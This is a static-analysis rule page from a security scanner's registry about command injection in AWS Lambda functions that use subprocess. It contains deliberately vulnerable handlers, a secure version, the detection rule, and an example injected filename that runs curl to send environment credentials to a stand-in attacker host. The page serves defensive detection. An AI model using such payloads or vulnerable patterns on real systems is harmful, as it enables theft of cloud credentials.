# PYTHON-LAMBDA-SEC-002: Lambda Command Injection via subprocess

> **Severity:** CRITICAL | **CWE:** CWE-78 | **OWASP:** A03:2021

- **Language:** Python
- **Category:** AWS Lambda
- **URL:** https://codepathfinder.dev/registry/python/aws_lambda/PYTHON-LAMBDA-SEC-002
- **Detection:** `pathfinder scan --ruleset python/PYTHON-LAMBDA-SEC-002 --project .`

## Description

This rule detects OS command injection vulnerabilities in AWS Lambda functions where
untrusted event data flows into subprocess module calls (subprocess.run(),
subprocess.call(), subprocess.Popen(), subprocess.check_output()) either as a string
command with shell=True or embedded in a shell command string.

Lambda functions receive input from the event dictionary populated by API Gateway,
SQS, SNS, S3, DynamoDB Streams, and other triggers. There is no sanitization layer
between the raw event payload and application code, making event fields like
event.get("body"), event.get("queryStringParameters"), and event["Records"][0]["body"]
fully attacker-controllable in public-facing deployments.

The subprocess module is safer than os.system() when used with a list argument and
shell=False (the default). However, two common patterns re-introduce shell injection
risk in Lambda handlers: passing a string to subprocess.run() with shell=True, and
building a command string via f-string interpolation of event data before passing it
to any subprocess variant. Both patterns cause the system shell to interpret
metacharacters in the event data. In a Lambda environment, successful injection
immediately grants access to the execution role's AWS credentials available in the
environment variables.


## Vulnerable Code

```python
import os
import subprocess
import asyncio

# SEC-002: subprocess with event data
def handler_subprocess(event, context):
    cmd = event.get('command')
    result = subprocess.call(cmd, shell=True)
    return {"statusCode": 200, "body": str(result)}


def handler_subprocess_popen(event, context):
    host = event.get('host')
    proc = subprocess.Popen(f"ping {host}", shell=True)
    return {"statusCode": 200}
```

## Secure Code

```python
import subprocess
import re
import json

def lambda_handler(event, context):
    body = json.loads(event.get('body', '{}'))
    width = body.get('width', '')
    height = body.get('height', '')
    filename = body.get('filename', '')

    # SECURE: Validate numeric inputs
    try:
        width = int(width)
        height = int(height)
    except (ValueError, TypeError):
        return {'statusCode': 400, 'body': 'Invalid dimensions'}

    # SECURE: Validate filename with strict regex
    if not re.match(r'^[a-zA-Z0-9_.\-]+$', filename):
        return {'statusCode': 400, 'body': 'Invalid filename'}

    # SECURE: Use subprocess with list, no shell=True
    result = subprocess.run(
        ['convert', f'/tmp/{filename}', '-resize', f'{width}x{height}', f'/tmp/out_{filename}'],
        capture_output=True,
        text=True,
        timeout=30
    )
    return {'statusCode': 200, 'body': {'success': result.returncode == 0}}

```

## Detection Rule (Python SDK)

```python
from codepathfinder.python_decorators import python_rule
from codepathfinder import calls, flows, QueryType
from codepathfinder.presets import PropagationPresets

class SubprocessModule(QueryType):
    fqns = ["subprocess"]

# Lambda event sources — event dict is the primary untrusted input
_LAMBDA_SOURCES = [
    calls("event.get"),
    calls("event.items"),
    calls("event.values"),
    calls("event.keys"),
    calls("*.get"),
]


@python_rule(
    id="PYTHON-LAMBDA-SEC-002",
    name="Lambda Command Injection via subprocess",
    severity="CRITICAL",
    category="aws_lambda",
    cwe="CWE-78",
    tags="python,aws,lambda,command-injection,subprocess,OWASP-A03,CWE-78",
    message="Lambda event data flows to subprocess call. Use shlex.quote() or list args.",
    owasp="A03:2021",
)
def detect_lambda_subprocess():
    """Detects Lambda event data flowing to subprocess functions."""
    return flows(
        from_sources=_LAMBDA_SOURCES,
        to_sinks=[
            SubprocessModule.method("call", "check_call", "check_output",
                                    "run", "Popen", "getoutput", "getstatusoutput"),
        ],
        sanitized_by=[
            calls("shlex.quote"),
            calls("shlex.split"),
        ],
        propagates_through=PropagationPresets.standard(),
        scope="global",
    )
```

## How to Fix

- Always use subprocess with a list of arguments and shell=False (the default) to prevent the shell from interpreting metacharacters in event data.
- Never use shell=True when any part of the command string originates from the Lambda event dictionary.
- Validate all event fields against strict allowlists or regular expressions before they appear in any subprocess call.
- Consider replacing subprocess calls with native Python libraries via Lambda Layers to eliminate the shell attack surface entirely.
- Apply least-privilege IAM policies to the Lambda execution role to minimize the blast radius of successful exploitation.

## Security Implications

- **AWS Credential Theft via Environment Variables:** Lambda execution environments expose AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY,
and AWS_SESSION_TOKEN as environment variables. subprocess with shell=True and
injected event data enables an attacker to run env or read /proc/self/environ to
capture these credentials, then use them to call AWS APIs with the full permissions
of the Lambda's execution role.

- **Shell Metacharacter Injection:** When event data is interpolated into a shell command string, characters like ;,
|, `, $(), &&, and || allow an attacker to append or chain arbitrary commands.
For example, f"convert {event['filename']} output.jpg" with filename set to
"x; curl attacker.com/exfil -d $(env)" executes the curl after the convert
regardless of whether convert succeeds.

- **Internal Network Access from VPC Lambda:** Lambda functions inside a VPC can reach internal subnets not accessible from
the internet. Command injection can be used to probe internal IP ranges, connect
to private RDS endpoints, or interact with internal APIs, pivoting from the
Lambda entry point to protected backend infrastructure.

- **Persistence via /tmp Modification:** The /tmp directory persists across warm invocations of the same execution
environment. An attacker can write scripts or binaries to /tmp that execute on
subsequent invocations of the same warm environment, creating a form of
persistence within the execution environment's lifetime.


## FAQ

**Q: When is subprocess safe in Lambda and when is it vulnerable?**

subprocess is safe when called with a list argument and shell=False (the default).
In list mode, the first element is the executable and remaining elements are
arguments passed directly to execve() without shell interpretation. It is
vulnerable when shell=True is set with any string containing event data, or when
a string command built from event data is passed even without explicit shell=True.


**Q: Does validating the event body before parsing protect against injection?**

Validation before use is the correct approach, but it must be applied to the
specific fields used in subprocess calls, not just to the top-level event body.
A JSON body that passes schema validation may still contain injection payloads
in nested fields. Validate each field individually with a strict regex or
allowlist immediately before it is used in a subprocess call.


**Q: What makes Lambda subprocess injection worse than in a traditional server?**

The execution role's temporary AWS credentials are automatically present as
environment variables in every Lambda invocation. Unlike a traditional server
where credentials must be separately stolen, a subprocess injection in Lambda
immediately yields cloud credentials with the full scope of the execution role.
These credentials can be exfiltrated in the same invocation via an outbound
HTTP call, giving the attacker persistent cloud access until the credentials expire.


**Q: Can I use shlex.quote() and keep shell=True for complex shell pipelines?**

shlex.quote() correctly escapes a single argument for shell inclusion, but it
must be applied to every individual argument. Even with correct shlex.quote()
usage, the preferred pattern is subprocess with a list and shell=False. For
pipelines, use subprocess.PIPE to chain multiple subprocess calls rather than
using shell=True.


**Q: How do I handle Lambda functions that process S3 object keys via subprocess?**

S3 object keys are attacker-controlled when the S3 bucket accepts uploads from
external sources. Before using an S3 key in subprocess, validate it against a
strict regex that only allows expected characters. Prefix the key with '--' when
passing it as an argument to prevent flag injection. Consider using the boto3
S3 client to download the object to /tmp with a sanitized local filename rather
than passing the raw S3 key to subprocess.


## References

- [CWE-78: OS Command Injection](https://cwe.mitre.org/data/definitions/78.html)
- [OWASP OS Command Injection Defense Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html)
- [Python subprocess Security Considerations](https://docs.python.org/3/library/subprocess.html#security-considerations)
- [AWS Lambda Security Best Practices](https://docs.aws.amazon.com/lambda/latest/dg/best-practices.html)
- [OWASP Command Injection](https://owasp.org/www-community/attacks/Command_Injection)
- [AWS Lambda Execution Environment](https://docs.aws.amazon.com/lambda/latest/dg/lambda-runtime-environment.html)

---

Source: https://codepathfinder.dev/registry/python/aws_lambda/PYTHON-LAMBDA-SEC-002
Code Pathfinder — Open source, type-aware SAST with cross-file dataflow analysis